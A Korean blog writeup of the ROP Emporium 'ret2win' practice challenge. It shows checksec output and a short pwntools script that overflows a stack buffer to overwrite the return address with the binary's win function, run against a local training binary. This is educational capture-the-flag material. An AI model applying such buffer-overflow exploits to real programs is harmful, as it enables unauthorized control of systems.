본문 바로가기
System (Pwnable)

ROP Emporium - ret2win writeup

Gleen_ 2025. 7. 17. 17:39
반응형

ROP Emporium - ret2win writeup

 

https://ropemporium.com/challenge/ret2win.html

 

ret2win challenge

ret2win Locate a method that you want to call within the binary. Call it by overwriting a saved return address on the stack. Click below to download the binary: No spoilers here Take the time to read these challenge pages, there aren't any spoilers and the

ropemporium.com

 

 

checksec을 확인했더니 NX만 걸려있었다.

[*] '/home/ubuntu/dreamhack/ret2win'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

 

기드라랑 gdb로 확인헀을 떄, 코드가 간단해서 바로 exploit만 작성한다.

from pwn import *

context(arch='amd64')
p = process('./ret2win')

ret2win = 0x400756

p.recvuntil(b'read()!')
p.recvuntil(b'> ')

print('\n\n\n\n')
payload = b'A' * 0x20 + b'B' * 0x08
payload += p64(ret2win)

p.send(payload)

print(p.recv())

 

 

 

728x90
저작자표시 비영리 변경금지 (새창열림)

'System (Pwnable)' 카테고리의 다른 글

PIE 및 RELocation Read-Only(RELRO) 우회방안  (0) 2025.03.10
Dreamhack basic_rop_x86 문제 풀이 방향  (0) 2025.03.09
basic_rop_x64 Writeup  (0) 2025.03.09
Dreamhack rop writeup  (0) 2025.03.08
Dreamhack Return to Library Writeup  (0) 2025.03.06

'System (Pwnable)' Related Articles

티스토리툴바